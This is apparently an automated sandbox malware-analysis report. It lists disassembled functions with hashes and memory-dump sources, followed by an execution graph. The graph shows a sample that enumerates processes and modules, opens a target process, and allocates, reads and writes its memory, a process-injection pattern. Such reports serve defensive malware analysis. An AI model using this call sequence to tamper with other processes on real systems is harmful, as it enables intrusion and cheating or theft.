                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: f164c879d24a16cd619102e784429bc4ba4cda0b982c1a824cf39fbc17923a01
                                                                          • Instruction ID: 87ad7d6833ac35f34b5e30785ac32e2d5b1192b3423a59e12748df1dfefa1022
                                                                          • Opcode Fuzzy Hash: f164c879d24a16cd619102e784429bc4ba4cda0b982c1a824cf39fbc17923a01
                                                                          • Instruction Fuzzy Hash: 7B618232908BC6C5EB319B15E4403AAF7A0FB84794F444266EB9D03B56EF7CD194CB21
                                                                          Function 00007FF7EA0245A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: 5857400b4c3492acd84904617338cd5ee528dc9639961a7cb852388250022800
                                                                          • Instruction ID: dc9bf47665c4eca3deeb9a02fb7edc17bed4da0abce65e6a783dde38c7c1f29d
                                                                          • Opcode Fuzzy Hash: 5857400b4c3492acd84904617338cd5ee528dc9639961a7cb852388250022800
                                                                          • Instruction Fuzzy Hash: 6851A132908383C6FB64AF119084368B790FB51BA8F944177DA6D47B96EF3DE4508B32
                                                                          Function 00007FF7EA02D230 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 0bb62f381188a36afd2a4503eaad4aac3375582898d2e62d292bd558da297374
                                                                          • Instruction ID: dc3d33ecf6d13802a27af6dcabaa26e955f3f2df1d5129b3bbeb3ed1da11b629
                                                                          • Opcode Fuzzy Hash: 0bb62f381188a36afd2a4503eaad4aac3375582898d2e62d292bd558da297374
                                                                          • Instruction Fuzzy Hash: CFD1F532B08B4689FB10DF65D5442ECB7B1FB45798B804176CE5D97B96EE38D806C320
                                                                          Function 00007FF7EA02DB58 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7EA02DB43,00000000), ref: 00007FF7EA02DC74
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7EA02DB43,00000000), ref: 00007FF7EA02DCFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: 975020c677df89971ff883a349c188ea2ce99affda7e7d61e491a3e14f68af64
                                                                          • Instruction ID: 1da72b2d6e5c748de55c70afc2d1640a924697f910d655f8ed10166784e4a26d
                                                                          • Opcode Fuzzy Hash: 975020c677df89971ff883a349c188ea2ce99affda7e7d61e491a3e14f68af64
                                                                          • Instruction Fuzzy Hash: 4B91E732E08B5385F750AF6594503BDABE0AF45B88F9441B7DE0E53A86EE38D845C732
                                                                          Function 00007FF7EA02D8C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 038869cbca5eba01ab20741052550c241c57ceeed58a67e343f361972134bdd7
                                                                          • Instruction ID: 4b475deef6c233d43c370b5cdbabb16699e89cd1502d67b82209b9031fde8b59
                                                                          • Opcode Fuzzy Hash: 038869cbca5eba01ab20741052550c241c57ceeed58a67e343f361972134bdd7
                                                                          • Instruction Fuzzy Hash: ED41F632B18B8286EB20EF25E4443AAA7A0FB88784F804032EE4D87745FF3CD405C761
                                                                          Function 00007FF7EA0233EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7EA02111F), ref: 00007FF7EA02343C
                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7EA02111F), ref: 00007FF7EA02347D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 1d6b90fde88b65395f7ddc23b7d9b97b964d3a8056fbaf4aba58218820383d9a
                                                                          • Instruction ID: c9d1a843d4264e94d81ddbf8e8eaaaeb91af64d5116c4ac290b6500513587fa7
                                                                          • Opcode Fuzzy Hash: 1d6b90fde88b65395f7ddc23b7d9b97b964d3a8056fbaf4aba58218820383d9a
                                                                          • Instruction Fuzzy Hash: 2C116032A08B8282EB619F15F540359B7E0FB88B94F984272EE8D07755EF3CD5558711

                                                                          Execution Graph

                                                                          Execution Coverage:17.5%
                                                                          Dynamic/Decrypted Code Coverage:0.3%
                                                                          Signature Coverage:32.2%
                                                                          Total number of Nodes:636
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 3773 7ff8b8f75640 3774 7ff8b8f75652 WriteProcessMemory 3773->3774 3777 7ff8b8f756b7 3773->3777 3775 7ff8b8f7568d free 3774->3775 3774->3777 3776 7ff8b8f756a4 free 3775->3776 3775->3777 3776->3777 3788 7ff8b8f74480 __std_type_info_compare 3789 7ff8b8f7449e 3788->3789 3790 7ff8b8f71080 3791 7ff8b8f710c0 3790->3791 3792 7ff8b8f710df 7 API calls 3791->3792 3793 7ff8b8f71297 3791->3793 3794 7ff8b8f71230 WriteProcessMemory 3792->3794 3795 7ff8b8f71261 WriteProcessMemory 3792->3795 3794->3795 3795->3793 3960 7ff8b8f71d40 3961 7ff8b8f71d4e VirtualFreeEx 3960->3961 3962 7ff8b8f71d77 3960->3962 3961->3962 3963 7ff8b8f74540 3964 7ff8b8f74549 free 3963->3964 3965 7ff8b8f74550 3963->3965 3964->3965 3976 7ff8b8f71d80 3977 7ff8b8f71da4 3976->3977 3996 7ff8b8f71f4f 3976->3996 3979 7ff8b8f74150 6 API calls 3977->3979 3978 7ff8b8f74570 8 API calls 3980 7ff8b8f71f76 3978->3980 3981 7ff8b8f71de1 3979->3981 3982 7ff8b8f73f70 45 API calls 3981->3982 3983 7ff8b8f71e2b 3981->3983 3982->3981 3984 7ff8b8f71e38 3983->3984 3985 7ff8b8f73f70 45 API calls 3983->3985 3986 7ff8b8f71e6a 3984->3986 3987 7ff8b8f71f7b 3984->3987 3985->3984 3989 7ff8b8f71e84 malloc 3986->3989 3991 7ff8b8f71eda WriteProcessMemory 3986->3991 3988 7ff8b8f73f50 45 API calls 3987->3988 3990 7ff8b8f71f80 3988->3990 3992 7ff8b8f71ea7 ReadProcessMemory 3989->3992 3993 7ff8b8f71ea1 free 3989->3993 3994 7ff8b8f71fe9 3990->3994 3995 7ff8b8f71fa0 WriteProcessMemory 3990->3995 3991->3996 3997 7ff8b8f71f19 3991->3997 3992->3991 3993->3992 3995->3994 3998 7ff8b8f71fd8 free 3995->3998 3996->3978 3999 7ff8b8f71f44 3997->3999 4000 7ff8b8f71f3d _invalid_parameter_noinfo_noreturn 3997->4000 3998->3994 4001 7ff8b8f74918 free 3999->4001 4000->3999 4001->3996 4003 7ff8b8f743c0 4004 7ff8b8f743ce 4003->4004 4005 7ff8b8f743ea 4003->4005 4004->4005 4006 7ff8b8f74918 free 4004->4006 4006->4005 3734 7ff8b8f75608 __scrt_dllmain_exception_filter 3339 7ff848a545a1 3340 7ff848a545bf 3339->3340 3343 7ff8b8f72010 CreateToolhelp32Snapshot 3340->3343 3344 7ff8b8f72052 Process32First 3343->3344 3345 7ff8b8f720f3 3343->3345 3346 7ff8b8f72068 3344->3346 3398 7ff8b8f72550 3345->3398 3346->3345 3347 7ff8b8f72070 strcmp 3346->3347 3349 7ff8b8f72095 3347->3349 3350 7ff8b8f72085 Process32Next 3347->3350 3362 7ff8b8f74920 3349->3362 3350->3346 3351 7ff8b8f720ff 3353 7ff8b8f7210f 3351->3353 3354 7ff8b8f72200 3351->3354 3404 7ff8b8f74200 CreateToolhelp32Snapshot 3353->3404 3418 7ff8b8f74570 3354->3418 3356 7ff8b8f7209f 3373 7ff8b8f71720 3356->3373 3361 7ff8b8f720d9 3361->3345 3363 7ff8b8f7493a malloc 3362->3363 3364 7ff8b8f7492b 3363->3364 3365 7ff8b8f74944 3363->3365 3364->3363 3366 7ff8b8f7494a 3364->3366 3365->3356 3367 7ff8b8f74955 3366->3367 3427 7ff8b8f75190 3366->3427 3430 7ff8b8f71400 3367->3430 3370 7ff8b8f7495b 3371 7ff8b8f7497e 3370->3371 3433 7ff8b8f74918 3370->3433 3371->3356 3374 7ff8b8f71744 memcpy 3373->3374 3376 7ff8b8f71765 3373->3376 3379 7ff8b8f7184c 3374->3379 3377 7ff8b8f71871 3376->3377 3380 7ff8b8f717b4 3376->3380 3382 7ff8b8f717e9 3376->3382 3437 7ff8b8f714a0 ?_Xlength_error@std@@YAXPEBD 3377->3437 3379->3361 3381 7ff8b8f71876 3380->3381 3383 7ff8b8f74920 4 API calls 3380->3383 3384 7ff8b8f71400 Concurrency::cancel_current_task __std_exception_copy 3381->3384 3385 7ff8b8f717d2 3382->3385 3387 7ff8b8f74920 4 API calls 3382->3387 3383->3385 3388 7ff8b8f7187c 3384->3388 3386 7ff8b8f7186a _invalid_parameter_noinfo_noreturn 3385->3386 3389 7ff8b8f717fe memcpy 3385->3389 3386->3377 3387->3385 3390 7ff8b8f71900 3388->3390 3392 7ff8b8f718dc WriteProcessMemory 3388->3392 3393 7ff8b8f7189c 3388->3393 3389->3379 3391 7ff8b8f7181f 3389->3391 3390->3361 3391->3386 3394 7ff8b8f71844 3391->3394 3392->3390 3395 7ff8b8f718ca WriteProcessMemory 3393->3395 3396 7ff8b8f718b8 WriteProcessMemory 3393->3396 3397 7ff8b8f74918 free 3394->3397 3395->3361 3396->3361 3397->3379 3399 7ff8b8f725a0 3398->3399 3401 7ff8b8f72569 3398->3401 3399->3351 3400 7ff8b8f72598 3403 7ff8b8f74918 free 3400->3403 3401->3399 3401->3400 3402 7ff8b8f725cc _invalid_parameter_noinfo_noreturn 3401->3402 3402->3351 3403->3399 3405 7ff8b8f7425d Module32First 3404->3405 3406 7ff8b8f7434a 3404->3406 3407 7ff8b8f74273 3405->3407 3408 7ff8b8f74570 8 API calls 3406->3408 3407->3406 3410 7ff8b8f742c2 Module32Next 3407->3410 3411 7ff8b8f742b1 memcmp 3407->3411 3409 7ff8b8f72119 3408->3409 3409->3354 3410->3407 3411->3410 3412 7ff8b8f742d2 OpenProcess 3411->3412 3413 7ff8b8f74920 4 API calls 3412->3413 3414 7ff8b8f74302 3413->3414 3415 7ff8b8f74920 4 API calls 3414->3415 3416 7ff8b8f7431b 3415->3416 3417 7ff8b8f74920 4 API calls 3416->3417 3417->3406 3420 7ff8b8f74579 3418->3420 3419 7ff848a54631 3420->3419 3421 7ff8b8f74d1c IsProcessorFeaturePresent 3420->3421 3422 7ff8b8f74d34 3421->3422 3729 7ff8b8f74df0 RtlCaptureContext 3422->3729 3436 7ff8b8f75170 3427->3436 3429 7ff8b8f7519e _CxxThrowException 3431 7ff8b8f7140e Concurrency::cancel_current_task 3430->3431 3432 7ff8b8f7141f __std_exception_copy 3431->3432 3432->3370 3434 7ff8b8f74910 free 3433->3434 3436->3429 3438 7ff8b8f715ca 3437->3438 3439 7ff8b8f714e3 3437->3439 3441 7ff8b8f74570 8 API calls 3438->3441 3440 7ff8b8f74920 4 API calls 3439->3440 3442 7ff8b8f714ed 3440->3442 3443 7ff8b8f715d7 3441->3443 3444 7ff8b8f7154f 3442->3444 3449 7ff8b8f73b70 3442->3449 3443->3381 3446 7ff8b8f74920 4 API calls 3444->3446 3448 7ff8b8f71597 3444->3448 3446->3448 3470 7ff8b8f736e0 3448->3470 3452 7ff8b8f73b91 3449->3452 3450 7ff8b8f73d6a 3511 7ff8b8f73d80 ?_Xlength_error@std@@YAXPEBD 3450->3511 3452->3450 3453 7ff8b8f73d65 3452->3453 3456 7ff8b8f73c2a 3452->3456 3457 7ff8b8f73bf7 3452->3457 3454 7ff8b8f71400 Concurrency::cancel_current_task __std_exception_copy 3453->3454 3454->3450 3458 7ff8b8f74920 4 API calls 3456->3458 3463 7ff8b8f73c0c 3456->3463 3457->3453 3460 7ff8b8f74920 4 API calls 3457->3460 3458->3463 3459 7ff8b8f73c42 memcpy 3461 7ff8b8f73c8c memcpy memset 3459->3461 3462 7ff8b8f73cb1 memcpy memcpy 3459->3462 3460->3463 3464 7ff8b8f73ce5 memset 3461->3464 3462->3464 3463->3459 3465 7ff8b8f73d5e _invalid_parameter_noinfo_noreturn 3463->3465 3466 7ff8b8f73d3c 3464->3466 3467 7ff8b8f73d07 3464->3467 3465->3453 3466->3444 3467->3465 3468 7ff8b8f73d34 3467->3468 3469 7ff8b8f74918 free 3468->3469 3469->3466 3471 7ff8b8f7371d 3470->3471 3472 7ff8b8f73b32 3470->3472 3473 7ff8b8f73778 3471->3473 3474 7ff8b8f73727 ReadProcessMemory memcmp 3471->3474 3475 7ff8b8f74570 8 API calls 3472->3475 3512 7ff8b8f731a0 3473->3512 3474->3472 3474->3473 3477 7ff8b8f73b3e 3475->3477 3477->3438 3478 7ff8b8f7381c 3592 7ff8b8f73f70 3478->3592 3479 7ff8b8f7377d 3479->3478 3480 7ff8b8f73ae1 _invalid_parameter_noinfo_noreturn 3479->3480 3481 7ff8b8f74918 free 3479->3481 3483 7ff8b8f73ae8 3480->3483 3481->3478 3485 7ff8b8f74918 free 3483->3485 3490 7ff8b8f73af3 3485->3490 3486 7ff8b8f7387b 3488 7ff8b8f738ab 3486->3488 3491 7ff8b8f73f70 45 API calls 3486->3491 3487 7ff8b8f73f70 45 API calls 3487->3486 3492 7ff8b8f738db 3488->3492 3495 7ff8b8f73f70 45 API calls 3488->3495 3489 7ff8b8f73b2d 3494 7ff8b8f74918 free 3489->3494 3490->3472 3490->3489 3493 7ff8b8f73b26 _invalid_parameter_noinfo_noreturn 3490->3493 3491->3488 3498 7ff8b8f73928 3492->3498 3611 7ff8b8f74150 3492->3611 3493->3489 3494->3472 3495->3492 3497 7ff8b8f73f70 45 API calls 3497->3498 3498->3497 3499 7ff8b8f7396a 3498->3499 3500 7ff8b8f74150 6 API calls 3499->3500 3503 7ff8b8f7399a 3499->3503 3500->3503 3501 7ff8b8f73f70 45 API calls 3501->3503 3502 7ff8b8f739dc 3504 7ff8b8f74150 6 API calls 3502->3504 3506 7ff8b8f739fd 3502->3506 3503->3501 3503->3502 3504->3506 3505 7ff8b8f73f70 45 API calls 3505->3506 3506->3505 3507 7ff8b8f73a46 3506->3507 3508 7ff8b8f73b5b _CxxThrowException 3507->3508 3509 7ff8b8f73a57 WriteProcessMemory WriteProcessMemory 3507->3509 3509->3490 3510 7ff8b8f73abd 3509->3510 3510->3480 3510->3483 3513 7ff8b8f731dc 3512->3513 3514 7ff8b8f736aa 3512->3514 3516 7ff8b8f74150 6 API calls 3513->3516 3515 7ff8b8f74570 8 API calls 3514->3515 3517 7ff8b8f736b6 3515->3517 3520 7ff8b8f73207 3516->3520 3517->3479 3518 7ff8b8f73f70 34 API calls 3518->3520 3519 7ff8b8f73249 3521 7ff8b8f74150 6 API calls 3519->3521 3523 7ff8b8f73275 3519->3523 3520->3518 3520->3519 3521->3523 3522 7ff8b8f73f70 34 API calls 3522->3523 3523->3522 3525 7ff8b8f732b7 3523->3525 3524 7ff8b8f74150 6 API calls 3524->3525 3525->3524 3526 7ff8b8f73f70 34 API calls 3525->3526 3527 7ff8b8f733b2 3525->3527 3526->3525 3528 7ff8b8f74150 6 API calls 3527->3528 3530 7ff8b8f733de 3527->3530 3528->3530 3529 7ff8b8f73f70 34 API calls 3529->3530 3530->3529 3531 7ff8b8f73426 3530->3531 3532 7ff8b8f74150 6 API calls 3531->3532 3533 7ff8b8f73f70 34 API calls 3531->3533 3534 7ff8b8f73522 3531->3534 3532->3531 3533->3531 3535 7ff8b8f74150 6 API calls 3534->3535 3537 7ff8b8f73548 3534->3537 3535->3537 3536 7ff8b8f73f70 34 API calls 3536->3537 3537->3536 3538 7ff8b8f7358a 3537->3538 3539 7ff8b8f73596 3538->3539 3540 7ff8b8f73f70 34 API calls 3538->3540 3541 7ff8b8f735ce 3539->3541 3542 7ff8b8f736d4 3539->3542 3540->3539 3544 7ff8b8f74920 4 API calls 3541->3544 3623 7ff8b8f73f50 ?_Xout_of_range@std@@YAXPEBD 3542->3623 3546 7ff8b8f735d8 VirtualAllocEx WriteProcessMemory 3544->3546 3547 7ff8b8f7366e 3546->3547 3548 7ff8b8f7364a VirtualFreeEx 3546->3548 3547->3514 3551 7ff8b8f7369f 3547->3551 3555 7ff8b8f73698 _invalid_parameter_noinfo_noreturn 3547->3555 3550 7ff8b8f74918 free 3548->3550 3549 7ff8b8f73b32 3554 7ff8b8f74570 8 API calls 3549->3554 3550->3547 3556 7ff8b8f74918 free 3551->3556 3552 7ff8b8f73778 3557 7ff8b8f731a0 34 API calls 3552->3557 3553 7ff8b8f73727 ReadProcessMemory memcmp 3553->3549 3553->3552 3558 7ff8b8f73b3e 3554->3558 3555->3551 3556->3514 3560 7ff8b8f7377d 3557->3560 3558->3479 3559 7ff8b8f7381c 3563 7ff8b8f73f70 34 API calls 3559->3563 3560->3559 3561 7ff8b8f73ae1 _invalid_parameter_noinfo_noreturn 3560->3561 3562 7ff8b8f74918 free 3560->3562 3564 7ff8b8f73ae8 3561->3564 3562->3559 3565 7ff8b8f73867 3563->3565 3566 7ff8b8f74918 free 3564->3566 3567 7ff8b8f7387b 3565->3567 3568 7ff8b8f73f70 34 API calls 3565->3568 3571 7ff8b8f73af3 3566->3571 3569 7ff8b8f738ab 3567->3569 3572 7ff8b8f73f70 34 API calls 3567->3572 3568->3567 3573 7ff8b8f738db 3569->3573 3576 7ff8b8f73f70 34 API calls 3569->3576 3570 7ff8b8f73b2d 3575 7ff8b8f74918 free 3570->3575 3571->3549 3571->3570 3574 7ff8b8f73b26 _invalid_parameter_noinfo_noreturn 3571->3574 3572->3569 3577 7ff8b8f74150 6 API calls 3573->3577 3579 7ff8b8f73928 3573->3579 3574->3570 3575->3549 3576->3573 3577->3579 3578 7ff8b8f73f70 34 API calls 3578->3579 3579->3578 3580 7ff8b8f7396a 3579->3580 3581 7ff8b8f74150 6 API calls 3580->3581 3584 7ff8b8f7399a 3580->3584 3581->3584 3582 7ff8b8f73f70 34 API calls 3582->3584 3583 7ff8b8f739dc 3585 7ff8b8f74150 6 API calls 3583->3585 3587 7ff8b8f739fd 3583->3587 3584->3582 3584->3583 3585->3587 3586 7ff8b8f73f70 34 API calls 3586->3587 3587->3586 3588 7ff8b8f73a46 3587->3588 3589 7ff8b8f73b5b _CxxThrowException 3588->3589 3590 7ff8b8f73a57 WriteProcessMemory WriteProcessMemory 3588->3590 3590->3571 3591 7ff8b8f73abd 3590->3591 3591->3561 3591->3564 3593 7ff8b8f73faf 3592->3593 3594 7ff8b8f740a7 3592->3594 3596 7ff8b8f73fd5 3593->3596 3597 7ff8b8f740ac 3593->3597 3598 7ff8b8f74024 3593->3598 3595 7ff8b8f73180 42 API calls 3594->3595 3595->3597 3599 7ff8b8f74920 4 API calls 3596->3599 3602 7ff8b8f71400 Concurrency::cancel_current_task __std_exception_copy 3597->3602 3600 7ff8b8f73fe9 3598->3600 3603 7ff8b8f74920 4 API calls 3598->3603 3601 7ff8b8f73fe4 3599->3601 3604 7ff8b8f74057 memcpy 3600->3604 3605 7ff8b8f74052 3600->3605 3601->3600 3606 7ff8b8f7401d _invalid_parameter_noinfo_noreturn 3601->3606 3607 7ff8b8f740b2 3602->3607 3603->3600 3608 7ff8b8f74070 memcpy 3604->3608 3605->3608 3606->3598 3609 7ff8b8f740c0 2 API calls 3608->3609 3610 7ff8b8f73867 3609->3610 3610->3486 3610->3487 3612 7ff8b8f7417a 3611->3612 3614 7ff8b8f741a2 3611->3614 3613 7ff8b8f741ed 3612->3613 3616 7ff8b8f74920 4 API calls 3612->3616 3619 7ff8b8f71400 Concurrency::cancel_current_task __std_exception_copy 3613->3619 3615 7ff8b8f7418d memcpy 3614->3615 3617 7ff8b8f74920 4 API calls 3614->3617 3615->3613 3620 7ff8b8f74188 3616->3620 3617->3615 3621 7ff8b8f741f2 3619->3621 3620->3615 3622 7ff8b8f7419b _invalid_parameter_noinfo_noreturn 3620->3622 3622->3614 3624 7ff8b8f73f70 3623->3624 3625 7ff8b8f73faf 3624->3625 3626 7ff8b8f740a7 3624->3626 3628 7ff8b8f73fd5 3625->3628 3629 7ff8b8f740ac 3625->3629 3630 7ff8b8f74024 3625->3630 3649 7ff8b8f73180 ?_Xlength_error@std@@YAXPEBD 3626->3649 3631 7ff8b8f74920 4 API calls 3628->3631 3634 7ff8b8f71400 Concurrency::cancel_current_task __std_exception_copy 3629->3634 3632 7ff8b8f73fe9 3630->3632 3635 7ff8b8f74920 4 API calls 3630->3635 3633 7ff8b8f73fe4 3631->3633 3636 7ff8b8f74057 memcpy 3632->3636 3637 7ff8b8f74052 3632->3637 3633->3632 3638 7ff8b8f7401d _invalid_parameter_noinfo_noreturn 3633->3638 3639 7ff8b8f740b2 3634->3639 3635->3632 3640 7ff8b8f74070 memcpy 3636->3640 3637->3640 3638->3630 3643 7ff8b8f740c0 3640->3643 3644 7ff8b8f740e8 3643->3644 3645 7ff8b8f736d9 3643->3645 3646 7ff8b8f7413d _invalid_parameter_noinfo_noreturn 3644->3646 3647 7ff8b8f7410d 3644->3647 3645->3549 3645->3552 3645->3553 3648 7ff8b8f74918 free 3647->3648 3648->3645 3650 7ff8b8f731a0 3649->3650 3651 7ff8b8f736aa 3650->3651 3653 7ff8b8f74150 6 API calls 3650->3653 3652 7ff8b8f74570 8 API calls 3651->3652 3654 7ff8b8f736b6 3652->3654 3657 7ff8b8f73207 3653->3657 3654->3629 3655 7ff8b8f73f70 33 API calls 3655->3657 3656 7ff8b8f73249 3658 7ff8b8f74150 6 API calls 3656->3658 3660 7ff8b8f73275 3656->3660 3657->3655 3657->3656 3658->3660 3659 7ff8b8f73f70 33 API calls 3659->3660 3660->3659 3661 7ff8b8f732b7 3660->3661 3662 7ff8b8f74150 6 API calls 3661->3662 3663 7ff8b8f73f70 33 API calls 3661->3663 3664 7ff8b8f733b2 3661->3664 3662->3661 3663->3661 3665 7ff8b8f74150 6 API calls 3664->3665 3667 7ff8b8f733de 3664->3667 3665->3667 3666 7ff8b8f73f70 33 API calls 3666->3667 3667->3666 3669 7ff8b8f73426 3667->3669 3668 7ff8b8f73f70 33 API calls 3668->3669 3669->3668 3670 7ff8b8f74150 6 API calls 3669->3670 3671 7ff8b8f73522 3669->3671 3670->3669 3672 7ff8b8f74150 6 API calls 3671->3672 3674 7ff8b8f73548 3671->3674 3672->3674 3673 7ff8b8f73f70 33 API calls 3673->3674 3674->3673 3675 7ff8b8f7358a 3674->3675 3676 7ff8b8f73596 3675->3676 3677 7ff8b8f73f70 33 API calls 3675->3677 3678 7ff8b8f735ce 3676->3678 3679 7ff8b8f736d4 3676->3679 3677->3676 3681 7ff8b8f74920 4 API calls 3678->3681 3680 7ff8b8f73f50 33 API calls 3679->3680 3682 7ff8b8f736d9 3680->3682 3683 7ff8b8f735d8 VirtualAllocEx WriteProcessMemory 3681->3683 3686 7ff8b8f73b32 3682->3686 3689 7ff8b8f73778 3682->3689 3690 7ff8b8f73727 ReadProcessMemory memcmp 3682->3690 3684 7ff8b8f7366e 3683->3684 3685 7ff8b8f7364a VirtualFreeEx 3683->3685 3684->3651 3688 7ff8b8f7369f 3684->3688 3692 7ff8b8f73698 _invalid_parameter_noinfo_noreturn 3684->3692 3687 7ff8b8f74918 free 3685->3687 3691 7ff8b8f74570 8 API calls 3686->3691 3687->3684 3693 7ff8b8f74918 free 3688->3693 3694 7ff8b8f731a0 33 API calls 3689->3694 3690->3686 3690->3689 3695 7ff8b8f73b3e 3691->3695 3692->3688 3693->3651 3697 7ff8b8f7377d 3694->3697 3695->3629 3696 7ff8b8f7381c 3700 7ff8b8f73f70 33 API calls 3696->3700 3697->3696 3698 7ff8b8f73ae1 _invalid_parameter_noinfo_noreturn 3697->3698 3699 7ff8b8f74918 free 3697->3699 3701 7ff8b8f73ae8 3698->3701 3699->3696 3702 7ff8b8f73867 3700->3702 3703 7ff8b8f74918 free 3701->3703 3704 7ff8b8f7387b 3702->3704 3705 7ff8b8f73f70 33 API calls 3702->3705 3708 7ff8b8f73af3 3703->3708 3706 7ff8b8f738ab 3704->3706 3709 7ff8b8f73f70 33 API calls 3704->3709 3705->3704 3710 7ff8b8f738db 3706->3710 3713 7ff8b8f73f70 33 API calls 3706->3713 3707 7ff8b8f73b2d 3712 7ff8b8f74918 free 3707->3712 3708->3686 3708->3707 3711 7ff8b8f73b26 _invalid_parameter_noinfo_noreturn 3708->3711 3709->3706 3714 7ff8b8f74150 6 API calls 3710->3714 3716 7ff8b8f73928 3710->3716 3711->3707 3712->3686 3713->3710 3714->3716 3715 7ff8b8f73f70 33 API calls 3715->3716 3716->3715 3717 7ff8b8f7396a 3716->3717 3718 7ff8b8f74150 6 API calls 3717->3718 3721 7ff8b8f7399a 3717->3721 3718->3721 3719 7ff8b8f73f70 33 API calls 3719->3721 3720 7ff8b8f739dc 3722 7ff8b8f74150 6 API calls 3720->3722 3724 7ff8b8f739fd 3720->3724 3721->3719 3721->3720 3722->3724 3723 7ff8b8f73f70 33 API calls 3723->3724 3724->3723 